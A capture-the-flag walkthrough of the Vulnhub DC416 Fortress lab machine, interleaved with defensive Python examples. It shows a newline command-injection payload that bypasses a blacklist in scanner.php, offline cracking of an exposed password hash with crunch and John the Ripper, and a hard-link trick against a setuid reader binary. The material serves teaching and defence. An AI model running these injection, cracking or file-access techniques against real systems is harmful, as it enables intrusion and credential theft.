Vulnhub – DC416 Fortress Walkthrough

This is my first write-up, on the Vulnhub DC416 Fortress challenge. We start by enumerating services, but before that we have to find out the IP address of the target machine.

Information Gathering

netdiscover will list all active devices on our network. (Our target is 192.168.1.6.)

Now that we know our target's IP address, let's find out which services are running. The Nmap scan suggests that the server is running FreeBSD and has a few services running.

On port 80 we have an Apache server running, so let's take a look.

There's nothing on that page. I tried to curl it to make sure there's nothing hidden inside, but no luck.

Now it's time for my favorite part: directory enumeration. 🙂

For that we have some awesome tools installed already in Kali Linux; my favorites are dirb and dirbuster. We had no luck because we couldn't find any directory, so let's try searching for files instead. We know the server is running Apache, so why not try searching for the .php extension.

dirb https://192.168.1.6 /usr/share/dirb/wordlists/big.txt

Let's do it!

dirb https://192.168.1.6 /usr/share/dirb/wordlists/big.txt -X .php

And we found our first lead, the scanner.php file. (https://192.168.1.6/scanner.php) 🙂 Let's take a look.

So we have something here. Let's try to find out what it is.

We have an input field where we enter an IP and it runs an Nmap command. Good! 🙂 Maybe we can try command injection here, so let's take a look at its response through Burp.

Read About Command Injection Here: https://www.owasp.org/index.php/Command_Injection

So we tried command injection, and it looks like there is some kind of filtering.

POST /scanner.php HTTP/1.1
Host: 192.168.1.6
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.6/scanner.php
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

host=127.0.0.1;ls

HTTP/1.1 200 OK
Date: Thu, 08 Mar 2018 23:53:45 GMT
Server: Apache/2.4.23 (FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27
X-Powered-By: PHP/5.6.27
Content-Length: 472
Connection: close
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>S C A N N 3 R</title>
<link rel="stylesheet" href="styles.css" type="text/css" />
</head>
<body>

<div class="container">

<form method="POST" action="">
  <input class="form" type="text" name="host" value="127.0.0.1" />
  <input class="button" type="submit" value="Scan Target" />
</form>
<pre>Command: /usr/local/bin/nmap -F -sT 127.0.0.1;ls

</pre><pre>Nope. Good try though... 💋</pre>

<img class="logo" src="logo.png">

</div>
</body>
</html>

So this didn't work!

host=127.0.0.1;ls

Let's try again, this time separating the commands with a newline instead of a semicolon:

host=127.0.0.1
ls

Awesome!
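The bypass above works because the filter is a blacklist: it rejects a literal `;` but not the other characters a shell treats as command separators, the newline among them. The following is an added example (not code from the write-up or from the challenge author) that models the observed filter beside the check the page should have used: validate the field as an IP address literal and pass it to the scanner as an argv element, never through a shell. The blacklist behaviour is an assumption based only on the two responses shown; the real scanner.php source is not on the page.

```python
import ipaddress
from typing import List

# Characters that let a value break out of a shell command line. The newline
# is the one the blacklist in scanner.php evidently missed.
SHELL_METACHARACTERS = ";|&$`\n\r<>()"


def weak_filter_accepts(host: str) -> bool:
    """Assumption: models the observed filter, which rejects a literal ';'
    and nothing else ("127.0.0.1;ls" refused, "127.0.0.1\\nls" accepted)."""
    return ";" not in host


def is_safe_host(host: str) -> bool:
    """Allowlist check: accept only a well-formed IPv4/IPv6 literal.
    ipaddress raises ValueError on whitespace, newlines and any other junk."""
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return False
    return True


def build_scan_argv(host: str) -> List[str]:
    """Build the scan as an argv list for subprocess.run(argv, shell=False).
    With no shell parsing the line, metacharacters in `host` would be passed
    to nmap as part of a single argument even if validation were bypassed."""
    if not is_safe_host(host):
        raise ValueError(f"refusing host field: {host!r}")
    return ["/usr/local/bin/nmap", "-F", "-sT", host]


def has_metacharacter(value: str) -> bool:
    """Detection helper: flag a submitted value that carries shell syntax."""
    return any(ch in value for ch in SHELL_METACHARACTERS)


def classify(host_field: str) -> str:
    """Label a submitted host value the way a detection rule would."""
    if is_safe_host(host_field):
        return "clean"
    if weak_filter_accepts(host_field):
        return "bypasses-blacklist"   # the newline case from the write-up
    return "caught-by-blacklist"


if __name__ == "__main__":
    # Constructed sample inputs: the benign value and the two payloads above.
    for sample in ("127.0.0.1", "127.0.0.1;ls", "127.0.0.1\nls"):
        print(repr(sample), "->", classify(sample))
```

The point of `build_scan_argv` is that the fix is not a longer blacklist: once the value must parse as an IP address and is never handed to a shell, there is no separator left to find.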

Now, after running ls -la, we found these directories.

  • k1ngd0m_k3yz
  • s1kr3t

These two directories look strange; let's have a look.

total 144
drwxr-xr-x  4 root  wheel    512 Nov  9  2016 .
drwxr-xr-x  6 root  wheel    512 Nov  9  2016 ..
-rw-r--r--  1 root  wheel    561 Nov  8  2016 index.html
drwxr-xr-x  2 root  wheel    512 Nov  9  2016 k1ngd0m_k3yz
-rw-r--r--  1 root  wheel  44867 Nov  4  2016 logo.png
drwxr-xr-x  2 root  wheel    512 Nov  9  2016 s1kr3t
-rw-r--r--  1 root  wheel    759 Nov  5  2016 scanner.php
-rw-r--r--  1 root  wheel    612 Nov  4  2016 styles.css

  • k1ngd0m_k3yz
-rw-r--r--  1 root  wheel  157 Nov  9  2016 master
-rw-r--r--  1 root  wheel   47 Nov  9  2016 passwd

  • s1kr3t
-rw-r--r--  1 root  wheel   31 Nov  4  2016 flag.txt

Now let's take a look inside the master and passwd files.

Inside the master file we have our hash. Save that to hash.txt in case we can't find any further lead.

craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002::0:0:User &:/home/craven:/bin/sh

Inside the passwd file:

craven:*:1002:1002:User &:/home/craven:/bin/sh

flag1

The first flag can be found in the s1kr3t directory.

cat s1kr3t/flag.txt
FLAG{n0_one_br3aches_teh_f0rt}

Finally, we have found our first flag.


From our previous findings we know that there is a user account named craven.

ls -la /home/craven/

-r--------  1 craven  craven    46 Nov  6  2016 flag.txt
-rw-r--r--  1 craven  craven   119 Nov  5  2016 hint.txt
-rw-r--r--  1 craven  craven    77 Nov  5  2016 reminders.txt

Looks like we have found our second flag inside the /home/craven/ directory.

We do not have read permission for flag.txt, so let's take a look at the hint.txt and reminders.txt files.

hint.txt

Keep forgetting my password, so I made myself a hint. Password is three digits followed by my
pet's name and a symbol.

reminders.txt

To buy:
* skim milk
* organic free-run eggs
* dog bone for qwerty
* sriracha

Now we have a hint, and it suggests that his dog's name is qwerty. We're going to add three digits before qwerty and one symbol after it, which can be done with the crunch wordlist generator.

  • qwerty
  • 3 digits
  • Symbol

crunch 10 10 -t %%%qwerty^ > pass.txt

This command generates every candidate password matching that pattern (length 10: three digits, qwerty, one symbol).

Now we have to crack the hash in hash.txt that we found earlier.

john -wordlist=pass.txt hash.txt

It seems that we have successfully cracked the password. 🙂

931qwerty?

Boom!
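The reason this cracks instantly is the size of the keyspace the hint leaves: three digits, a fixed word and one symbol. The following is an added example (not code from the write-up, from crunch or from John the Ripper) that models how crunch's `-t` pattern expands, counts the candidates without enumerating them, and turns the same pattern into a policy check a defender can run against a proposed password. The symbol set used for `^` is an assumption standing in for crunch's default symbol class, which may differ by a few characters; digits, lowercase and uppercase match crunch's `%`, `@` and `,` placeholders.

```python
import itertools
import re
from typing import Iterator

# crunch -t placeholder classes. The '^' symbol string is an ASSUMPTION; the
# exact default set in crunch may contain a few more or fewer characters.
PLACEHOLDERS = {
    "%": "0123456789",
    "@": "abcdefghijklmnopqrstuvwxyz",
    ",": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "^": "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/",
}


def expand_pattern(pattern: str) -> Iterator[str]:
    """Yield every candidate for a crunch-style pattern; literal characters
    in the pattern stay fixed, placeholders range over their class."""
    classes = [PLACEHOLDERS.get(ch, ch) for ch in pattern]
    for combo in itertools.product(*classes):
        yield "".join(combo)


def keyspace_size(pattern: str) -> int:
    """Number of candidates the pattern expands to, computed directly."""
    size = 1
    for ch in pattern:
        size *= len(PLACEHOLDERS.get(ch, ch))
    return size


def pattern_to_regex(pattern: str) -> "re.Pattern[str]":
    """Translate the same pattern into an anchored regular expression."""
    parts = []
    for ch in pattern:
        if ch in PLACEHOLDERS:
            parts.append("[" + re.escape(PLACEHOLDERS[ch]) + "]")
        else:
            parts.append(re.escape(ch))
    return re.compile("^" + "".join(parts) + "$")


def matches_hint_pattern(password: str, pattern: str) -> bool:
    """Policy-side check: does a password fit a structure that a written-down
    hint (digits + pet name + symbol) would give away?"""
    return pattern_to_regex(pattern).match(password) is not None


if __name__ == "__main__":
    hint = "%%%qwerty^"
    print("keyspace for", hint, "=", keyspace_size(hint))
    # The value recovered in the write-up; constructed check, not a recompute.
    print("931qwerty? fits the hint:", matches_hint_pattern("931qwerty?", hint))
```

Tens of thousands of candidates is nothing for an offline attack against a single SHA-512-crypt hash; the hint reduces the search to a pattern a regex can describe, which is exactly why such hints, and the world-readable copy of the hash under the web root, are the real findings here.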

Now we're able to get our second flag.

$ pwd
/usr/home/craven
$ ls
flag.txt	hint.txt	reminders.txt
$ cat flag.txt 
FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}

flag2

FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}

It's time to get our third flag.

I did cd /home and found another user name: vulnhub. We can spot a setuid binary belonging to the user vulnhub in its home directory, /home/vulnhub.

$ ls
craven	vulnhub
$ pwd
/usr/home

Inside the vulnhub directory we have our third flag and a reader file.

$ ls
flag.txt	reader

Running file on reader gives us some information about the binary.

reader: setuid ELF 64-bit LSB executable, x86-64, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 11.0 (1100122), FreeBSD-style, not stripped

Since we can execute the reader file as the craven user, we should be able to read our third flag. Let's try. 🙂

It seems the binary checks the filename for flag.txt, so let's try to trick this check with a symbolic link:

Now on to a hard link. (https://www.computerhope.com/unix/uln.htm)

Boom! 🙂
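The lesson for anyone writing a privileged file reader is that a name is not an identity: a hard link is a second name for the same inode, so a check on the path string says nothing about which file is actually opened. The following is an added example (not the challenge's reader source, which is not on the page; the name check it models is an assumption drawn from the write-up's description) that contrasts the weak name-based deny rule with a check on the opened file's device and inode number, refuses to follow a symlink at the final component, and builds a scratch directory to show what each check says about a hard link and a symlink.

```python
import os
import shutil
import tempfile

PROTECTED_NAME = "flag.txt"


def name_check_allows(path: str) -> bool:
    """The weak rule (assumed model of the reader binary): deny only when the
    last path component is literally flag.txt."""
    return os.path.basename(path) != PROTECTED_NAME


def identity_check_allows(path: str, protected_path: str) -> bool:
    """Deny if the object we would actually read IS the protected inode,
    whatever it is called. O_NOFOLLOW makes a symlink at the final
    component fail outright instead of being silently followed."""
    protected = os.stat(protected_path)
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError:
        return False  # symlink at the last step, or not readable
    try:
        st = os.fstat(fd)  # stat the fd we hold, not the name we were given
    finally:
        os.close(fd)
    return (st.st_dev, st.st_ino) != (protected.st_dev, protected.st_ino)


def has_extra_links(path: str) -> bool:
    """Detection signal: a sensitive file that suddenly has more than one
    name (st_nlink > 1) has been hard-linked from somewhere."""
    return os.stat(path).st_nlink > 1


def demo() -> dict:
    """Build a scratch directory (constructed data) holding the protected
    file, a hard link under another name and a symlink, then report what the
    name check and the identity check say about each."""
    scratch = tempfile.mkdtemp()
    try:
        protected = os.path.join(scratch, PROTECTED_NAME)
        with open(protected, "w") as fh:
            fh.write("FLAG{constructed_example_value}\n")
        hard = os.path.join(scratch, "notes.txt")
        os.link(protected, hard)            # second name, same inode
        sym = os.path.join(scratch, "link.txt")
        os.symlink(protected, sym)          # pointer to the name
        other = os.path.join(scratch, "hint.txt")
        open(other, "w").close()            # unrelated, genuinely allowed
        return {
            "hardlink_name_check": name_check_allows(hard),
            "hardlink_identity_check": identity_check_allows(hard, protected),
            "symlink_name_check": name_check_allows(sym),
            "symlink_identity_check": identity_check_allows(sym, protected),
            "other_identity_check": identity_check_allows(other, protected),
            "protected_has_extra_links": has_extra_links(protected),
        }
    finally:
        shutil.rmtree(scratch)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The identity check is still only a mitigation of the specific trick; the durable fix is for a setuid helper not to be a generic file reader at all, and to rely on filesystem permissions rather than on string comparisons against a name it does not control.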

flag3

FLAG{its_A_ph0t0_ph1ni5h}

 
